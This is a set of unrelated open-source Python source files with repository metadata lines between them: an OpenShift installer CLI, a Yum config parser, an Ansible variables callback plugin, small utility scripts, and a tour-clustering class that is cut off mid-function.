click.echo(" - Load Balancer (Preconfigured)")
else:
click.echo(" - Load Balancer (HAProxy)")
if host.master:
if host.is_etcd_member(all_hosts):
click.echo(" - Etcd Member")
else:
click.echo(" - Etcd (Embedded)")
def collect_master_lb(hosts):
"""
Get a valid load balancer from the user and append it to the list of
hosts.
Ensure user does not specify a system already used as a master/node as
this is an invalid configuration.
"""
message = """
Setting up High Availability Masters requires a load balancing solution.
Please provide the FQDN of a host that will be configured as a proxy. This
can be either an existing load balancer configured to balance all masters on
port 8443 or a new host that will have HAProxy installed on it.
If the host provided is not yet configured, a reference haproxy load
balancer will be installed. It's important to note that while the rest of the
environment will be fault tolerant this reference load balancer will not be.
It can be replaced post-installation with a load balancer with the same
hostname.
"""
click.echo(message)
host_props = {}
# Using an embedded function here so we have access to the hosts list:
def validate_prompt_lb(hostname):
# Run the standard hostname check first:
hostname = validate_prompt_hostname(hostname)
# Make sure this host wasn't already specified:
for host in hosts:
if host.connect_to == hostname and (host.master or host.node):
raise click.BadParameter('Cannot re-use "%s" as a load balancer, '
'please specify a separate host' % hostname)
return hostname
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_lb)
install_haproxy = click.confirm('Should the reference haproxy load balancer be installed on this host?')
host_props['preconfigured'] = not install_haproxy
host_props['master'] = False
host_props['node'] = False
host_props['master_lb'] = True
master_lb = Host(**host_props)
hosts.append(master_lb)
def confirm_hosts_facts(oo_cfg, callback_facts):
hosts = oo_cfg.hosts
click.clear()
message = """
A list of the facts gathered from the provided hosts follows. Because it is
often the case that the hostname for a system inside the cluster is different
from the hostname that is resolvable from command line or web clients,
these settings cannot be validated automatically.
For some cloud providers the installer is able to gather metadata exposed in
the instance so reasonable defaults will be provided.
Please confirm that they are correct before moving forward.
"""
notes = """
Format:
connect_to,IP,public IP,hostname,public hostname
Notes:
* The installation host is the hostname from the installer's perspective.
* The IP of the host should be the internal IP of the instance.
* The public IP should be the externally accessible IP associated with the instance
* The hostname should resolve to the internal IP from the instances
themselves.
* The public hostname should resolve to the external ip from hosts outside of
the cloud.
"""
# For testing purposes we need to click.echo only once, so build up
# the message:
output = message
default_facts_lines = []
default_facts = {}
for h in hosts:
if h.preconfigured:
continue
default_facts[h.connect_to] = {}
h.ip = callback_facts[h.connect_to]["common"]["ip"]
h.public_ip = callback_facts[h.connect_to]["common"]["public_ip"]
h.hostname = callback_facts[h.connect_to]["common"]["hostname"]
h.public_hostname = callback_facts[h.connect_to]["common"]["public_hostname"]
default_facts_lines.append(",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, ",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, notes)
click.echo(output)
facts_confirmed = click.confirm("Do the above facts look correct?")
if not facts_confirmed:
message = """
Edit %s with the desired values and run `atomic-openshift-installer --unattended install` to restart the install.
""" % oo_cfg.config_path
click.echo(message)
# Make sure we actually write out the config file.
oo_cfg.save_to_disk()
sys.exit(0)
return default_facts
def check_hosts_config(oo_cfg, unattended):
click.clear()
masters = [host for host in oo_cfg.hosts if host.master]
if len(masters) == 2:
click.echo("A minimum of 3 Masters are required for HA deployments.")
sys.exit(1)
if len(masters) > 1:
master_lb = [host for host in oo_cfg.hosts if host.master_lb]
if len(master_lb) > 1:
click.echo('ERROR: More than one Master load balancer specified. Only one is allowed.')
sys.exit(1)
elif len(master_lb) == 1:
if master_lb[0].master or master_lb[0].node:
click.echo('ERROR: The Master load balancer is configured as a master or node. Please correct this.')
sys.exit(1)
else:
message = """
ERROR: No master load balancer specified in config. You must provide the FQDN
of a load balancer to balance the API (port 8443) on all Master hosts.
https://docs.openshift.org/latest/install_config/install/advanced_install.html#multiple-masters
"""
click.echo(message)
sys.exit(1)
dedicated_nodes = [host for host in oo_cfg.hosts if host.node and not host.master]
if len(dedicated_nodes) == 0:
message = """
WARNING: No dedicated Nodes specified. By default, colocated Masters have
their Nodes set to unschedulable. If you proceed all nodes will be labelled
as schedulable.
"""
if unattended:
click.echo(message)
else:
confirm_continue(message)
return
def get_variant_and_version(multi_master=False):
message = "\nWhich variant would you like to install?\n\n"
i = 1
combos = get_variant_version_combos()
for (variant, version) in combos:
message = "%s\n(%s) %s %s" % (message, i, variant.description,
version.name)
i = i + 1
message = "%s\n" % message
click.echo(message)
if multi_master:
click.echo('NOTE: 3.0 installations are not')
response = click.prompt("Choose a variant from above: ", default=1)
product, version = combos[response - 1]
return product, version
def confirm_continue(message):
if message:
click.echo(message)
click.confirm("Are you ready to continue?", default=False, abort=True)
return
def error_if_missing_info(oo_cfg):
missing_info = False
if not oo_cfg.hosts:
missing_info = True
click.echo('For unattended installs, hosts must be specified on the '
'command line or in the config file: %s' % oo_cfg.config_path)
sys.exit(1)
if 'ansible_ssh_user' not in oo_cfg.settings:
click.echo("Must specify ansible_ssh_user in configuration file.")
sys.exit(1)
# Lookup a variant based on the key we were given:
if not oo_cfg.settings['variant']:
click.echo("No variant specified in configuration file.")
sys.exit(1)
ver = None
if 'variant_version' in oo_cfg.settings:
ver = oo_cfg.settings['variant_version']
variant, version = find_variant(oo_cfg.settings['variant'], version=ver)
if variant is None or version is None:
err_variant_name = oo_cfg.settings['variant']
if ver:
err_variant_name = "%s %s" % (err_variant_name, ver)
click.echo("%s is not an installable variant." % err_variant_name)
sys.exit(1)
oo_cfg.settings['variant_version'] = version.name
missing_facts = oo_cfg.calc_missing_facts()
if len(missing_facts) > 0:
missing_info = True
click.echo('For unattended installs, facts must be provided for all masters/nodes:')
for host in missing_facts:
click.echo('Host "%s" missing facts: %s' % (host, ", ".join(missing_facts[host])))
if missing_info:
sys.exit(1)
def get_missing_info_from_user(oo_cfg):
""" Prompts the user for any information missing from the given configuration. """
click.clear()
message = """
Welcome to the OpenShift Enterprise 3 installation.
Please confirm that following prerequisites have been met:
* All systems where OpenShift will be installed are running Red Hat Enterprise
Linux 7.
* All systems are properly subscribed to the required OpenShift Enterprise 3
repositories.
* All systems have run docker-storage-setup (part of the Red Hat docker RPM).
* All systems have working DNS that resolves not only from the perspective of
the installer but also from within the cluster.
When the process completes you will have a default configuration for Masters
and Nodes. For ongoing environment maintenance it's recommended that the
official Ansible playbooks be used.
For more information on installation prerequisites please see:
https://docs.openshift.com/enterprise/latest/admin_guide/install/prerequisites.html
"""
confirm_continue(message)
click.clear()
if oo_cfg.settings.get('ansible_ssh_user', '') == '':
oo_cfg.settings['ansible_ssh_user'] = get_ansible_ssh_user()
click.clear()
if oo_cfg.settings.get('variant', '') == '':
variant, version = get_variant_and_version()
oo_cfg.settings['variant'] = variant.name
oo_cfg.settings['variant_version'] = version.name
click.clear()
if not oo_cfg.hosts:
oo_cfg.hosts = collect_hosts(oo_cfg)
click.clear()
return oo_cfg
def collect_new_nodes(oo_cfg):
click.clear()
click.echo('*** New Node Configuration ***')
message = """
Add new nodes here
"""
click.echo(message)
return collect_hosts(oo_cfg, existing_env=True, masters_set=True, print_summary=False)
def get_installed_hosts(hosts, callback_facts):
installed_hosts = []
for host in hosts:
if(host.connect_to in callback_facts.keys()
and 'common' in callback_facts[host.connect_to].keys()
and callback_facts[host.connect_to]['common'].get('version', '')
and callback_facts[host.connect_to]['common'].get('version', '') != 'None'):
installed_hosts.append(host)
return installed_hosts
# pylint: disable=too-many-branches
# This pylint error will be corrected shortly in separate PR.
def get_hosts_to_run_on(oo_cfg, callback_facts, unattended, force, verbose):
# Copy the list of existing hosts so we can remove any already installed nodes.
hosts_to_run_on = list(oo_cfg.hosts)
# Check if master or nodes already have something installed
installed_hosts = get_installed_hosts(oo_cfg.hosts, callback_facts)
if len(installed_hosts) > 0:
click.echo('Installed environment detected.')
# This check has to happen before we start removing hosts later in this method
if not force:
if not unattended:
click.echo('By default the installer only adds new nodes ' \
'to an installed environment.')
response = click.prompt('Do you want to (1) only add additional nodes or ' \
'(2) reinstall the existing hosts ' \
'potentially erasing any custom changes?',
type=int)
# TODO: this should be reworked with error handling.
# Click can certainly do this for us.
# This should be refactored as soon as we add a 3rd option.
if response == 1:
force = False
if response == 2:
force = True
# present a message listing already installed hosts and remove hosts if needed
for host in installed_hosts:
if host.master:
click.echo("{} is already an OpenShift Master".format(host))
# Masters stay in the list, we need to run against them when adding
# new nodes.
elif host.node:
click.echo("{} is already an OpenShift Node".format(host))
# force is only used for reinstalls so we don't want to remove
# anything.
if not force:
hosts_to_run_on.remove(host)
# Handle the cases where we know about uninstalled systems
new_hosts = set(hosts_to_run_on) - set(installed_hosts)
if len(new_hosts) > 0:
for new_host in new_hosts:
click.echo("{} is currently uninstalled".format(new_host))
# Fall through
click.echo('Adding additional nodes...')
else:
if unattended:
if not force:
click.echo('Installed environment detected and no additional ' \
'nodes specified: aborting. If you want a fresh install, use ' \
'`atomic-openshift-installer install --force`')
sys.exit(1)
else:
if not force:
new_nodes = collect_new_nodes(oo_cfg)
hosts_to_run_on.extend(new_nodes)
oo_cfg.hosts.extend(new_nodes)
openshift_ansible.set_config(oo_cfg)
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts, verbose)
if error:
click.echo("There was a problem fetching the required information. See " \
"{} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
else:
pass # proceeding as normal should do a clean install
return hosts_to_run_on, callback_facts
@click.group()
@click.pass_context
@click.option('--unattended', '-u', is_flag=True, default=False)
@click.option('--configuration', '-c',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-playbook-directory',
'-a',
type=click.Path(exists=True,
file_okay=False,
dir_okay=True,
readable=True),
# callback=validate_ansible_dir,
default=DEFAULT_PLAYBOOK_DIR,
envvar='OO_ANSIBLE_PLAYBOOK_DIRECTORY')
@click.option('--ansible-config',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-log-path',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default="/tmp/ansible.log")
@click.option('-v', '--verbose',
is_flag=True, default=False)
#pylint: disable=too-many-arguments
#pylint: disable=line-too-long
# Main CLI entrypoint, not much we can do about too many arguments.
def cli(ctx, unattended, configuration, ansible_playbook_directory, ansible_config, ansible_log_path, verbose):
"""
atomic-openshift-installer makes the process for installing OSE or AEP
easier by interactively gathering the data needed to run on each host.
It can also be run in unattended mode if provided with a configuration file.
Further reading: https://docs.openshift.com/enterprise/latest/install_config/install/quick_install.html
"""
ctx.obj = {}
ctx.obj['unattended'] = unattended
ctx.obj['configuration'] = configuration
ctx.obj['ansible_config'] = ansible_config
ctx.obj['ansible_log_path'] = ansible_log_path
ctx.obj['verbose'] = verbose
try:
oo_cfg = OOConfig(ctx.obj['configuration'])
except OOConfigInvalidHostError as e:
click.echo(e)
sys.exit(1)
# If no playbook dir on the CLI, check the config:
if not ansible_playbook_directory:
ansible_playbook_directory = oo_cfg.settings.get('ansible_playbook_directory', '')
# If still no playbook dir, check for the default location:
if not ansible_playbook_directory and os.path.exists(DEFAULT_PLAYBOOK_DIR):
ansible_playbook_directory = DEFAULT_PLAYBOOK_DIR
validate_ansible_dir(ansible_playbook_directory)
oo_cfg.settings['ansible_playbook_directory'] = ansible_playbook_directory
oo_cfg.ansible_playbook_directory = ansible_playbook_directory
ctx.obj['ansible_playbook_directory'] = ansible_playbook_directory
if ctx.obj['ansible_config']:
oo_cfg.settings['ansible_config'] = ctx.obj['ansible_config']
elif 'ansible_config' not in oo_cfg.settings and \
os.path.exists(DEFAULT_ANSIBLE_CONFIG):
# If we're installed by RPM this file should exist and we can use it as our default:
oo_cfg.settings['ansible_config'] = DEFAULT_ANSIBLE_CONFIG
oo_cfg.settings['ansible_log_path'] = ctx.obj['ansible_log_path']
ctx.obj['oo_cfg'] = oo_cfg
openshift_ansible.set_config(oo_cfg)
@click.command()
@click.pass_context
def uninstall(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
click.echo("OpenShift will be uninstalled from the following hosts:\n")
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Uninstall cancelled.")
sys.exit(0)
openshift_ansible.run_uninstall_playbook(verbose)
@click.command()
@click.pass_context
def upgrade(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
# Update config to reflect the version we're targeting; we'll write
# to disk once ansible completes successfully, not before.
old_variant = oo_cfg.settings['variant']
old_version = oo_cfg.settings['variant_version']
if oo_cfg.settings['variant'] == 'enterprise':
oo_cfg.settings['variant'] = 'openshift-enterprise'
version = find_variant(oo_cfg.settings['variant'])[1]
oo_cfg.settings['variant_version'] = version.name
click.echo("Openshift will be upgraded from %s %s to %s %s on the following hosts:\n" % (
old_variant, old_version, oo_cfg.settings['variant'],
oo_cfg.settings['variant_version']))
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Upgrade cancelled.")
sys.exit(0)
retcode = openshift_ansible.run_upgrade_playbook(verbose)
if retcode > 0:
click.echo("Errors encountered during upgrade, please check %s." %
oo_cfg.settings['ansible_log_path'])
else:
oo_cfg.save_to_disk()
click.echo("Upgrade completed! Rebooting all hosts is recommended.")
@click.command()
@click.option('--force', '-f', is_flag=True, default=False)
@click.pass_context
def install(ctx, force):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if ctx.obj['unattended']:
error_if_missing_info(oo_cfg)
else:
oo_cfg = get_missing_info_from_user(oo_cfg)
check_hosts_config(oo_cfg, ctx.obj['unattended'])
print_installation_summary(oo_cfg.hosts, oo_cfg.settings.get('variant_version', None))
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts,
verbose)
if error:
click.echo("There was a problem fetching the required information. " \
"Please see {} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
hosts_to_run_on, callback_facts = get_hosts_to_run_on(
oo_cfg, callback_facts, ctx.obj['unattended'], force, verbose)
click.echo('Writing config to: %s' % oo_cfg.config_path)
# We already verified this is not the case for unattended installs, so this can
# only trigger for live CLI users:
# TODO: if there are *new* nodes and this is a live install, we may need the user
# to confirm the settings for new nodes. Look into this once we're distinguishing
# between new and pre-existing nodes.
if len(oo_cfg.calc_missing_facts()) > 0:
confirm_hosts_facts(oo_cfg, callback_facts)
oo_cfg.save_to_disk()
click.echo('Ready to run installation process.')
message = """
If changes are needed please edit the config file above and re-run.
"""
if not ctx.obj['unattended']:
confirm_continue(message)
error = openshift_ansible.run_main_playbook(oo_cfg.hosts,
hosts_to_run_on, verbose)
if error:
# The bootstrap script will print out the log location.
message = """
An error was detected. After resolving the problem please relaunch the
installation process.
"""
click.echo(message)
sys.exit(1)
else:
message = """
The installation was successful!
If this is your first time installing please take a look at the Administrator
Guide for advanced options related to routing, storage, authentication and much
more:
http://docs.openshift.com/enterprise/latest/admin_guide/overview.html
"""
click.echo(message)
click.pause()
cli.add_command(install)
cli.add_command(upgrade)
cli.add_command(uninstall)
if __name__ == '__main__':
# This is expected behaviour for context passing with click library:
# pylint: disable=unexpected-keyword-arg
cli(obj={})
|
apache-2.0
| -6,367,065,744,073,844,000
| 37.594859
| 120
| 0.636845
| false
| 3.992403
| true
| false
| false
|
lemiere/python-lecture
|
tp_stat/exemples/boucle_for.py
|
1
|
1274
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Lemiere Yves
# July 2017
def main():
debug = True
if debug:
print("*************************")
print("* Welcome in boucle_for *")
print("*************************\n")
# This is a list of character strings:
my_list_of_heroes = ['Spider-Man','Daredevil','Iron Man','Flash','Wonder Woman']
print(my_list_of_heroes)
# The variable 'hero' will take, in turn, each value of the list my_list_of_heroes:
iterator = 0
for hero in my_list_of_heroes:
print (iterator)
print ("my current hero is {}".format(hero))
iterator = iterator + 1
print("Finished with {} heroes ".format(iterator))
print("Finished with {} heroes ".format(len(my_list_of_heroes)))
# This loop only starts from the third element of the list (index 2):
iterator = 0
for hero in my_list_of_heroes[2:]:
print (iterator)
print ("my current hero is {}".format(hero))
iterator = iterator + 1
print("Finished with {} heroes ".format(iterator))
print("Finished with {} heroes ".format(len(my_list_of_heroes)))
return
main()
|
gpl-3.0
| 3,050,231,175,831,166,500
| 26.586957
| 93
| 0.547675
| false
| 3.476712
| false
| false
| false
|
wcmitchell/insights-core
|
insights/parsers/yum_conf.py
|
1
|
2326
|
"""
YumConf - file ``/etc/yum.conf``
================================
This module provides parsing for the ``/etc/yum.conf`` file.
The ``YumConf`` class parses the information in the file
``/etc/yum.conf``. See the ``IniConfigFile`` class for more
information on attributes and methods.
Sample input data looks like::
[main]
cachedir=/var/cache/yum/$basearch/$releasever
keepcache=0
debuglevel=2
logfile=/var/log/yum.log
exactarch=1
obsoletes=1
gpgcheck=1
plugins=1
installonly_limit=3
[rhel-7-server-rpms]
metadata_expire = 86400
baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch
name = Red Hat Enterprise Linux 7 Server (RPMs)
gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-redhat-release
enabled = 1
gpgcheck = 1
Examples:
>>> yconf = shared[YumConf]
>>> yconf.defaults()
{}
>>> 'main' in yconf
True
>>> 'rhel-7-server-rpms' in yconf
True
>>> yconf.has_option('main', 'gpgcheck')
True
>>> yconf.has_option('main', 'foo')
False
>>> yconf.get('rhel-7-server-rpms', 'enabled')
'1'
>>> yconf.items('main')
{'plugins': '1',
'keepcache': '0',
'cachedir': '/var/cache/yum/$basearch/$releasever',
'exactarch': '1',
'obsoletes': '1',
'installonly_limit': '3',
'debuglevel': '2',
'gpgcheck': '1',
'logfile': '/var/log/yum.log'}
"""
from insights.contrib.ConfigParser import NoOptionError
from .. import parser, IniConfigFile
from insights.specs import yum_conf
@parser(yum_conf)
class YumConf(IniConfigFile):
"""Parse contents of file ``/etc/yum.conf``."""
def parse_content(self, content):
super(YumConf, self).parse_content(content)
# File /etc/yum.conf may contain repos definitions.
# Keywords 'gpgkey' and 'baseurl' might contain multiple
# values separated by comma. Convert those values into a list.
for section in self.sections():
for key in ('gpgkey', 'baseurl'):
try:
value = self.get(section, key)
if value and isinstance(value, str):
self.data.set(section, key, value.split(','))
except NoOptionError:
pass
|
apache-2.0
| -8,295,788,500,542,155,000
| 28.075
| 70
| 0.596733
| false
| 3.497744
| false
| false
| false
|
pressbooks/trellis
|
lib/trellis/plugins/callback/vars.py
|
1
|
4548
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import sys
from __main__ import cli
from ansible.module_utils.six import iteritems
from ansible.errors import AnsibleError
from ansible.parsing.yaml.objects import AnsibleMapping, AnsibleSequence, AnsibleUnicode
from ansible.playbook.play_context import PlayContext
from ansible.playbook.task import Task
from ansible.plugins.callback import CallbackBase
from ansible.template import Templar
from ansible.utils.unsafe_proxy import wrap_var
class CallbackModule(CallbackBase):
''' Creates and modifies play and host variables '''
CALLBACK_VERSION = 2.0
CALLBACK_NAME = 'vars'
def __init__(self):
super(CallbackModule, self).__init__()
# handle Ansible 2.7 and 2.8 cases by normalizing each into a dict
try:
from ansible import context
self._options = context.CLIARGS
except ImportError:
self._options = vars(cli.options) if cli else {}
def raw_triage(self, key_string, item, patterns):
# process dict values
if isinstance(item, AnsibleMapping):
return AnsibleMapping(dict((key,self.raw_triage('.'.join([key_string, key]), value, patterns)) for key,value in iteritems(item)))
# process list values
elif isinstance(item, AnsibleSequence):
return AnsibleSequence([self.raw_triage('.'.join([key_string, str(i)]), value, patterns) for i,value in enumerate(item)])
# wrap values if they match raw_vars pattern
elif isinstance(item, AnsibleUnicode):
match = next((pattern for pattern in patterns if re.match(pattern, key_string)), None)
return wrap_var(item) if match else item
else:
return item
def raw_vars(self, play, host, hostvars):
if 'raw_vars' not in hostvars:
return
raw_vars = Templar(variables=hostvars, loader=play._loader).template(hostvars['raw_vars'])
if not isinstance(raw_vars, list):
raise AnsibleError('The `raw_vars` variable must be defined as a list.')
patterns = [re.sub(r'\*', '(.)*', re.sub(r'\.', r'\.', var)) for var in raw_vars if var.split('.')[0] in hostvars]
keys = set(pattern.split(r'\.')[0] for pattern in patterns)
for key in keys:
if key in play.vars:
play.vars[key] = self.raw_triage(key, play.vars[key], patterns)
elif key in hostvars:
host.vars[key] = self.raw_triage(key, hostvars[key], patterns)
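# Illustrative note (hypothetical group_vars entry): with
#   raw_vars: ['some_sites.*.env']
# every hostvar value whose dotted key path matches the pattern is wrapped with
# wrap_var(), so later Jinja2 templating leaves it untouched; all other values
# pass through raw_triage() unchanged.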
def cli_options(self):
options = []
strings = {
'--connection': 'connection',
'--private-key': 'private_key_file',
'--ssh-common-args': 'ssh_common_args',
'--ssh-extra-args': 'ssh_extra_args',
'--timeout': 'timeout',
'--vault-password-file': 'vault_password_file',
}
for option,value in iteritems(strings):
if self._options.get(value, False):
options.append("{0}='{1}'".format(option, str(self._options.get(value))))
for inventory in self._options.get('inventory'):
options.append("--inventory='{}'".format(str(inventory)))
if self._options.get('ask_vault_pass', False):
options.append('--ask-vault-pass')
return ' '.join(options)
def darwin_without_passlib(self):
if not sys.platform.startswith('darwin'):
return False
try:
import passlib.hash
return False
except:
return True
def v2_playbook_on_play_start(self, play):
env = play.get_variable_manager().get_vars(play=play).get('env', '')
env_group = next((group for key,group in iteritems(play.get_variable_manager()._inventory.groups) if key == env), False)
if env_group:
env_group.set_priority(20)
for host in play.get_variable_manager()._inventory.list_hosts(play.hosts[0]):
hostvars = play.get_variable_manager().get_vars(play=play, host=host)
self.raw_vars(play, host, hostvars)
host.vars['ssh_args_default'] = PlayContext(play=play)._ssh_args.default
host.vars['cli_options'] = self.cli_options()
host.vars['cli_ask_pass'] = self._options.get('ask_pass', False)
host.vars['cli_ask_become_pass'] = self._options.get('become_ask_pass', False)
host.vars['darwin_without_passlib'] = self.darwin_without_passlib()
|
mit
| 7,478,106,766,313,598,000
| 38.894737
| 141
| 0.616755
| false
| 4.014122
| false
| false
| false
|
HarrieO/PairwisePreferenceMultileave
|
utils/argparsers/multileaveargparser.py
|
1
|
1774
|
# -*- coding: utf-8 -*-
import sys
import os
import argparse
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
from utils.argparsers.simulationargparser import SimulationArgumentParser
class MultileaveArgumentParser(SimulationArgumentParser):
def __init__(self, description=None, set_arguments={}):
set_arguments['print_feature_count'] = False
super(MultileaveArgumentParser, self).__init__(description=description,
set_arguments=set_arguments)
# self.set_argument_namespace('MultileaveArgumentParser')
# self.add_argument('--bias', dest='bias_experiment', action='store_true', required=False,
# default=False, help='Flag for bias experiment.')
# self.add_argument('--k --n_results', dest='k', default=10, type=int,
# help='Number of results shown after each query.')
self.add_argument('--n_rankers', dest='n_rankers', required=True, type=int,
help='Number of rankers to use in simulation.')
# def get_multileave_args(self, args):
# return self.get_args(args, 'MultileaveArgumentParser')
# def parse_args_rec(self):
# output_str, args, sim_args = super(MultileaveArgumentParser, self).parse_args_rec()
# multileave_args = self.get_multileave_args(args)
# if not sim_args.no_run_details:
# output_str += '\nMultileave Arguments'
# output_str += '\n---------------------'
# for name, value in vars(multileave_args).items():
# output_str += '\n%s %s' % (name, value)
# output_str += '\n---------------------'
# return output_str, args, sim_args, multileave_args
|
mit
| 1,622,209,415,317,331,000
| 44.487179
| 98
| 0.590192
| false
| 3.977578
| false
| false
| false
|
alexhunsley/nsconf-video-file-renamer
|
nsConfVidsRenamer.py
|
1
|
1816
|
# NSConf videos renamer
# Alex Hunsley 2013
#
# This quick hack fixes the WTF that is the file naming of the NSConf videos.
# Note that the files are renamed by making copies, rather than
# renamed in place, to avoid annoying irreversible screwups.
#
import csv
import os.path
import sys
import string
import shutil
# source vid files
vidsFolder = "allVidsUnzipped"
# destination vid files (look here for the renamed goodness)
renamedVidsFolder = "allVidsRenamed"
if os.path.exists(renamedVidsFolder):
shutil.rmtree(renamedVidsFolder)
os.makedirs(renamedVidsFolder)
# This file should have been provided alongside this script.
# It's metadata created from the NSConf vids download page. Which is itself
# inconsistent in the format of data it provides, and some stuff near the end
# is in the wrong order. What do I look like to you, the unix sort command?
csvfile = open('NSConfVidsSummary1.csv', 'rb')
validFilenameChars = "-_.() %s%s" % (string.ascii_letters, string.digits)
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
firstRow = True
for row in reader:
if (firstRow):
firstRow = False
continue
vidFilename = row[8]
description = row[0]
vidIndex = vidFilename[:2]
authors = row[1]
baseName = row[9]
if (len(authors) == 0):
authors = "Misc"
fullFilename = "%s - %02d %s (%s).%s" % (baseName, int(vidIndex), description, authors, "m4v")
fullFilename = ''.join(c for c in fullFilename if c in validFilenameChars)
fullDestinationFilename = "%s/%s" % (renamedVidsFolder, fullFilename)
fullSourceFilename = "%s/%s.m4v" % (vidsFolder, vidFilename)
print "%s --> %s" % (fullSourceFilename, fullDestinationFilename)
try:
shutil.copyfile(fullSourceFilename, fullDestinationFilename)
except IOError:
print "****** Warning: file not found: %s" % fullSourceFilename
|
mit
| -1,552,988,196,664,735,200
| 27.375
| 95
| 0.73348
| false
| 3.277978
| false
| false
| false
|
WorldViews/Spirals
|
scripts/filterLayer.py
|
1
|
1154
|
import json
#from LandOrSea import overLand
from LandOrSeaBaseline import overLand
def filterByLand(path, opath):
obj = json.load(file(path))
recs = obj['records']
landRecs = []
n = 0
nLand = 0
for rec in recs:
n += 1
lat = rec['lat']
lon = rec['lon']
if overLand(lat,lon):
nLand += 1
landRecs.append(rec)
print nLand, n
obj['records'] = landRecs
json.dump(obj, file(opath, "w"), indent=4)
print "Num Recs: %d over land: %d\n" % (n, nLand)
#filterByLand("../Viewer/data/dancing_data.json", "../Viewer/data/dance_data.json")
#filterByLand("../Viewer/data/temples0_data.json", "../Viewer/data/temples_data.json")
#filterByLand("../Viewer/data/climbing0_data.json", "../Viewer/data/climbing_data.json")
#filterByLand("../Viewer/data/temples0_data.json", "../Viewer/data/temples_data.json")
#filterByLand("../Viewer/data/hiking0_data.json", "../Viewer/data/hiking_data.json")
filterByLand("../Viewer/data/gardens0_data.json", "../Viewer/data/gardens_data.json")
filterByLand("../Viewer/data/surfing0_data.json", "../Viewer/data/surfing_data.json")
|
mit
| 942,163,728,044,186,400
| 31.971429
| 88
| 0.641248
| false
| 2.780723
| false
| false
| false
|
joshzarrabi/e-mission-server
|
emission/analysis/modelling/tour_model/representatives.py
|
1
|
8413
|
# standard imports
import numpy
import math
import copy
# our imports
from emission.core.wrapper.trip_old import Trip, Coordinate
import emission.storage.decorations.trip_queries as esdtq
import emission.storage.decorations.place_queries as esdpq
"""
This class creates a group of representatives for each cluster
and defines the locations that the user visits from those clusters.
The purpose of this class is to get the list of clusters with
start and end points to create the tour graph.
To use this class, as input it takes
- data: A list of trip objects
- labels: A list of integers that define the clusters on the data.
The labels are calculated in cluster pipeline from the clusters. The labels
should be a list of integers of the same length as the list of data, where
different numbers indicate different clusters.
"""
class representatives:
def __init__(self, data, labels, old=True):
self.data = data
self.is_old = old
if not self.data:
self.data = []
self.labels = labels
if not self.labels:
self.labels = []
if len(self.data) != len(self.labels):
raise ValueError('Length of data must equal length of clustering labels.')
self.num_clusters = len(set(self.labels))
self.size = len(self.data)
#get the list of clusters based on the labels
def list_clusters(self):
if not self.data:
self.clusters = []
return
self.clusters = [0] * self.num_clusters
for i in range(self.num_clusters):
self.clusters[i] = []
for i in range(len(self.labels)):
a = self.labels[i]
self.clusters[a].append(self.data[i])
#get the representatives for each cluster
def get_reps(self):
self.reps = []
if not self.data:
return
for cluster in self.clusters:
points = [[], [], [], []]
for c in cluster:
if self.is_old:
points[0].append(c.trip_start_location.lat)
points[1].append(c.trip_start_location.lon)
points[2].append(c.trip_end_location.lat)
points[3].append(c.trip_end_location.lon)
else:
# We want (lat, lon) to be consistent with old above.
# But in the new, our data is in geojson so it is (lon, lat).
# Fix it by flipping the order of the indices
points[0].append(c.start_loc["coordinates"][1])
points[1].append(c.start_loc["coordinates"][0])
points[2].append(c.end_loc["coordinates"][1])
points[3].append(c.end_loc["coordinates"][0])
centers = numpy.mean(points, axis=1)
a = Trip(None, None, None, None, None, None, Coordinate(centers[0], centers[1]), Coordinate(centers[2], centers[3]))
self.reps.append(a)
#map the representatives
def map(self):
import pygmaps
mymap = pygmaps.maps(37.5, -122.32, 10)
for t in self.reps:
start_lat = t.trip_start_location.lat
start_lon = t.trip_start_location.lon
end_lat = t.trip_end_location.lat
end_lon = t.trip_end_location.lon
path = [(start_lat, start_lon), (end_lat, end_lon)]
mymap.addpath(path)
for l in self.locs:
mymap.addpoint(l.lat, l.lon, '#0000FF')
mymap.draw('./myreps.html')
#define the set of locations for the data
def locations(self):
self.bins = []
self.locs = []
if not self.data:
self.num_locations = 0
return
for a in range(self.num_clusters):
added_start = False
added_end = False
for bin in self.bins:
if self.match('start', a, bin) and not added_start:
bin.append(('start', a))
added_start = True
if self.match('end', a, bin) and not added_end:
bin.append(('end', a))
added_end = True
if not added_start:
newbin = [('start', a)]
if self.match('end', a, newbin) and not added_end:
newbin.append(('end', a))
added_end = True
self.bins.append(newbin)
if not added_end:
self.bins.append([('end', a)])
self.num_locations = len(self.bins)
self.locs = []
for bin in self.bins:
locs = []
for b in bin:
if b[0] == 'start':
point = self.reps[b[1]].trip_start_location
